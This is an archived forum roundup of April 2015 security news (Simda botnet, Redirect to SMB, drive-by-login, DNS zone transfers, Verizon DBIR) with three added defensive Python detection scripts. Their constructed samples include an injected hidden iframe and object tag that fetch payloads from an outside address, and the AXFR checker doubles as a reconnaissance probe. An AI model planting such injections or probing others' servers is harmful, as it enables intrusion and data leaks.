Thank you for being a valued part of the CNET community. As of December 1, 2020, the forums are in read-only format. In early 2021, CNET Forums will no longer be available. We are grateful for the participation and advice you have provided to one another over the years.

Thanks,

CNET Support

NEWS - April 14, 2015

Apr 14, 2015 2:25AM PDT
Botnet that enslaved 770,000 PCs worldwide comes crashing down

"The Simda botnet that menaced 190 countries is no more."

Simda, as the botnet was known, infected an additional 128,000 new computers each month over the past half year, a testament to the stealth of the underlying backdoor trojan and the organization of its creators. The backdoor morphed into a new, undetectable form every few hours, allowing it to stay one step ahead of many antivirus programs. Botnet operators used a variety of methods to infect targets, including exploiting known vulnerabilities in software such as Oracle Java, Adobe Flash, and Microsoft Silverlight.

The exploits were stitched into websites by exploiting SQL injection vulnerabilities and exploit kits such as Blackhole and Styx. Other methods included sending spam and other forms of social engineering. Countries most affected by Simda included the US, with 22 percent of the infections, followed by the UK, Turkey with five percent, and Canada and Russia with four percent.

Continued : http://arstechnica.com/security/2015/04/botnet-that-enslaved-770000-pcs-worldwide-comes-crashing-down/

Related :
Coordinated Takedown Puts End to Simda Botnet
Backdoor bot brains snatched after cops, white hats raid servers
Simda Botnet Expanded over 190 Countries, Controlled from 14 Servers

18-year-old bug can be exploited to steal credentials of Windows users
Apr 14, 2015 2:46AM PDT

A new technique for exploiting an 18-year-old bug in Windows Server Message Block (SMB), which would allow attackers to intercept user credentials, has been uncovered by Cylance researcher Brian Wallace.

SMB is a core component in Windows networking, and can be found - and is enabled by default - in all versions of the Windows OS, including Windows 10.

"Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim's username, domain and hashed password," the researcher explained.

Continued : http://www.net-security.org/secworld.php?id=18210

Related :
Unpatched 18 year-old Windows man-in-the-middle diddle revived
New SMB Flaw Affects All Versions of Windows
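
An added example (not code from Cylance or from the articles linked above) of the check a network team would want after reading this: scanning web-proxy logs for redirects whose Location header points at an SMB server. It assumes the hijacked reply in a Redirect to SMB attack is an HTTP 3xx whose Location names a share as a file:// URL or a UNC path; the log layout and the sample lines are constructed, not captured from a real proxy.

```python
"""Flag HTTP redirects that would send a Windows client to an SMB server.

Added example for this thread, not code from Cylance or the linked articles.
Assumption: the hijacked reply in a Redirect to SMB attack is an HTTP 3xx whose
Location header names an SMB share as a file:// URL or a UNC path; the log
format and the sample lines below are constructed for illustration.
"""
import ipaddress
import re
from urllib.parse import urlparse

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# Constructed proxy-log layout (not any real product's format):
#   <client-ip> <http-status> <requested-url> "<Location header, or empty>"
LOG_LINE = re.compile(
    r'^(?P<client>\S+)\s+(?P<status>\d{3})\s+(?P<url>\S+)\s+"(?P<location>[^"]*)"\s*$'
)

# Address ranges treated as "inside": RFC 1918 plus loopback.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def smb_target(location):
    """Return the host an SMB-bound Location header points at, or None.

    Both a UNC path (\\\\host\\share) and a file:// URL with a host part make
    a Windows URL handler open an SMB connection, which is what the attack
    relies on; ordinary http(s) redirects return None.
    """
    loc = location.strip()
    if loc.startswith("\\\\"):
        return re.split(r"[\\/]", loc[2:], maxsplit=1)[0] or None
    parsed = urlparse(loc)
    if parsed.scheme.lower() == "file":
        return parsed.netloc or None
    return None


def is_external(host):
    """True unless host is an IP address inside INTERNAL_NETS (hostnames count as external)."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not any(addr in net for net in INTERNAL_NETS)


def find_smb_redirects(lines):
    """Return the redirects in the log that would trigger an outbound SMB connection."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        if int(match.group("status")) not in REDIRECT_STATUSES:
            continue
        host = smb_target(match.group("location"))
        if host is None:
            continue
        hits.append({
            "client": match.group("client"),
            "url": match.group("url"),
            "smb_host": host,
            "external": is_external(host),
        })
    return hits


# Constructed sample log lines (not captured from a real proxy).
SAMPLE_LOG = [
    '10.1.2.3 302 http://www.example.com/old "http://www.example.com/new"',
    '10.1.2.3 302 http://www.example.com/update "file://203.0.113.7/share/update.exe"',
    '10.1.2.9 301 http://cdn.example.net/img.png "\\\\203.0.113.7\\c$\\img.png"',
    '10.1.2.9 200 http://www.example.com/ ""',
    '10.1.2.4 302 http://intranet.example.com/x "file://10.0.0.5/tools"',
]

if __name__ == "__main__":
    for hit in find_smb_redirects(SAMPLE_LOG):
        flag = "EXTERNAL" if hit["external"] else "internal"
        print(f'{hit["client"]} -> {hit["url"]} redirected to SMB host {hit["smb_host"]} ({flag})')
```

Each hit names the client that would have opened an SMB connection and where to; a redirect to an external SMB host is exactly the pattern the post describes. The usual mitigation is to block outbound TCP 139 and 445 at the network edge so such a redirect has nowhere to go, and the log check above tells you whether anyone was being steered that way before the block went in.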
Malicious Actors Use "Drive-by-Login" Technique in Targeted Attacks
Apr 14, 2015 2:46AM PDT

High-Tech Bridge has spotted an interesting attack in which the threat actor used what researchers believe is a new vector for delivering malware to a targeted individual.

Dubbed by the security firm "drive-by-login," the technique is similar to drive-by downloads in which malware is delivered to victims when they visit the attacker's website. However, in drive-by-login attacks, the attacker sets up malicious code on a website he knows the victim is going to visit. The malicious code is designed to deliver malware only to the targeted user, not all website visitors.

High-Tech Bridge analyzed such an attack after being alerted by the owner of a medium-size online store in Central Europe. The customer noticed that his website was trying to infect his computer with malware. Initially, researchers believed it might have been a false positive since they didn't see any attempts to deliver malware, but a closer investigation revealed that it was actually a cleverly staged targeted attack.

Continued : http://www.securityweek.com/malicious-actors-use-drive-login-technique-targeted-attacks

Related : Universal backdoor for e-commerce platform lets hackers shop for victims
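
An added example (not High-Tech Bridge's code) of the comparison a site owner can make when, as in this case, only one person sees the site try to infect them: fetch the same page anonymously, as an unrelated account and as the targeted account, then list the active content (scripts, iframes, objects) that appears only in the targeted account's view. The three sample pages are constructed for illustration, not taken from the incident.

```python
"""Find active content served only to one logged-in account.

Added example for this thread, not code from High-Tech Bridge. It assumes the
store owner can save the same page three ways (anonymous, as an unrelated
account, and as the targeted account); the three sample pages below are
constructed, not taken from the incident described in the article.
"""
import hashlib
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class ActiveContent(HTMLParser):
    """Collect external script/iframe/object sources and hashes of inline scripts."""

    def __init__(self):
        super().__init__()
        self.items = set()
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src") or attrs.get("data")
        if tag in ACTIVE_TAGS and src:
            self.items.add(f"{tag}:{src}")
        if tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            body = "".join(self._script_buf).strip()
            if body:   # inline script: record a hash, not the text, so output stays short
                digest = hashlib.sha256(body.encode("utf-8")).hexdigest()[:16]
                self.items.add(f"inline-script:{digest}")
            self._in_script = False
            self._script_buf = []


def active_content(html):
    parser = ActiveContent()
    parser.feed(html)
    parser.close()
    return parser.items


def targeted_only(anonymous_html, other_user_html, target_user_html):
    """Active content present in the targeted account's view and nowhere else.

    Legitimate account pages add scripts too, so anything also served to an
    unrelated logged-in account is discounted; what remains is what a
    drive-by-login payload looks like from the victim's side.
    """
    baseline = active_content(anonymous_html) | active_content(other_user_html)
    return active_content(target_user_html) - baseline


# Constructed sample pages (not from the real store).
ANONYMOUS = '<html><head><script src="/js/app.js"></script></head><body>Shop</body></html>'
OTHER_USER = ('<html><head><script src="/js/app.js"></script>'
              '<script src="/js/account.js"></script></head><body>Hi Bob</body></html>')
TARGET_USER = ('<html><head><script src="/js/app.js"></script>'
               '<script src="/js/account.js"></script></head><body>Hi Alice'
               '<iframe src="http://203.0.113.9/load.php" width="1" height="1"></iframe>'
               '<script>document.write(\'<object data="http://203.0.113.9/x.jar"></object>\')</script>'
               '</body></html>')

if __name__ == "__main__":
    for item in sorted(targeted_only(ANONYMOUS, OTHER_USER, TARGET_USER)):
        print("served only to the targeted account:", item)
```

Run it against saved copies of the page from the three sessions; anything it prints is content the server chose to give one account and nobody else, which is the defining property of the technique the article describes and the thing a generic malware scan of the site will not see.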
US-CERT Warns of Issues With DNS Zone Transfer Requests
Apr 14, 2015 2:46AM PDT

The US-CERT is warning administrators and network operators that a misconfiguration issue with some DNS servers that has been known about for more than 15 years and can give attackers detailed information about DNS zones is coming back around thanks to new scans that show a high number of servers vulnerable to the issue.

The problem is in the way that some DNS servers will respond to zone transfer requests from other servers. Primary DNS servers are set up to replicate specific information about their zones to secondary DNS servers, and if the primary servers don't authenticate the requests they can hand over detailed domain information to an attacker.

Continued : https://threatpost.com/us-cert-warns-of-issues-with-dns-zone-transfer-requests/112225

Related :
Misconfigured DNS Servers Vulnerable to Domain Info Leak
Misconfigured DNS servers may leak domain info, warns US-CERT
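
An added example, not code from US-CERT or from the articles linked above: a minimal zone-transfer check written against the raw DNS wire format so it needs no third-party library. It sends one AXFR question over TCP and looks at the first reply message; a server that answers NOERROR with the zone's SOA record is handing the zone to whoever asks, which is the misconfiguration the advisory is about. It assumes plain DNS on TCP port 53 with no TSIG; the server name, zone and both sample replies are constructed.

```python
"""Check whether a nameserver answers AXFR requests (zone-transfer check).

Added example, not code from the US-CERT advisory or the linked articles.
Assumptions: plain RFC 1035 DNS over TCP on port 53, no TSIG; the server,
zone and the two sample replies below are constructed for illustration.
"""
import socket
import struct

QTYPE_AXFR = 252
QTYPE_SOA = 6
QCLASS_IN = 1


def encode_name(name):
    """Encode a dotted name as DNS labels (no compression)."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    """Build an AXFR query: 12-byte header, one question with QTYPE 252."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack(">HH", QTYPE_AXFR, QCLASS_IN)


def skip_name(msg, off):
    """Return the offset just past the name at msg[off:], handling compression pointers."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:      # two-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def parse_reply(msg):
    """Return (rcode, answer_count, type_of_first_answer) from a DNS reply."""
    _txid, flags, qdcount, ancount, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    rcode = flags & 0x000F
    off = 12
    for _ in range(qdcount):
        off = skip_name(msg, off) + 4          # QTYPE + QCLASS
    first_type = None
    if ancount:
        off = skip_name(msg, off)
        first_type = struct.unpack(">H", msg[off:off + 2])[0]
    return rcode, ancount, first_type


def transfer_allowed(reply):
    """The zone leaks if the server says NOERROR and starts the transfer with the SOA."""
    rcode, ancount, first_type = parse_reply(reply)
    return rcode == 0 and ancount > 0 and first_type == QTYPE_SOA


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def check_axfr(server, zone, timeout=5.0):
    """Send one AXFR query over TCP (2-byte length prefix) and judge the first reply."""
    query = build_axfr_query(zone)
    with socket.create_connection((server, 53), timeout=timeout) as sock:
        sock.sendall(struct.pack(">H", len(query)) + query)
        (length,) = struct.unpack(">H", recv_exact(sock, 2))
        return transfer_allowed(recv_exact(sock, length))


# --- constructed sample replies (not captured from any real server) ---
QUESTION = encode_name("example.com") + struct.pack(">HH", QTYPE_AXFR, QCLASS_IN)

# Properly restricted server: flags 0x8185 = response, RCODE 5 (REFUSED), no answers.
REFUSED_REPLY = struct.pack(">HHHHHH", 0x1234, 0x8185, 1, 0, 0, 0) + QUESTION

# Misconfigured server: flags 0x8180 = response, NOERROR, first answer is the zone SOA.
_soa_rdata = (encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
              + struct.pack(">IIIII", 2015041401, 3600, 900, 604800, 86400))
OPEN_REPLY = (struct.pack(">HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0) + QUESTION
              + b"\xc0\x0c" + struct.pack(">HHIH", QTYPE_SOA, QCLASS_IN, 3600, len(_soa_rdata))
              + _soa_rdata)

if __name__ == "__main__":
    print("refused sample leaks zone:", transfer_allowed(REFUSED_REPLY))
    print("open sample leaks zone:", transfer_allowed(OPEN_REPLY))
```

check_axfr("ns1.example.com", "example.com") returns True when the server hands over the zone and False on REFUSED; run it from outside your own network, since the advisory's point is that the request is honoured for anyone. The fix is on the server: restrict transfers to the secondaries' addresses (BIND's allow-transfer) and sign them with TSIG, then re-run the check.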

Verizon 2015 DBIR: Don't Sweat Mobile and IoT
Apr 14, 2015 5:29AM PDT

Verizon on Tuesday released its widely anticipated 2015 Data Breach Investigations Report (DBIR), a must-read report compiled by Verizon with the support of 70 contributing partners, which analyzed 79,790 security incidents and 2,122 confirmed data breaches across 61 different countries.

While the industry is flooded with reports and survey data almost daily, Verizon's annual DBIR is the top "must read" report of the year.

Verizon's 2015 DBIR has expanded its investigation into nine common threat patterns and sizes up the effects of all types of data breaches, from small data disclosures to larger, headline-making events.

Continued : http://www.securityweek.com/verizon-2015-dbir-dont-sweat-mobile-and-iot

Related :
Verizon DBIR: Mobile Devices Not A Factor In Real-World Attacks
Verizon's data breach report can't find any mobile malware - so is it all hype?
Takeaways From the 2015 Verizon Data Breach Investigations Report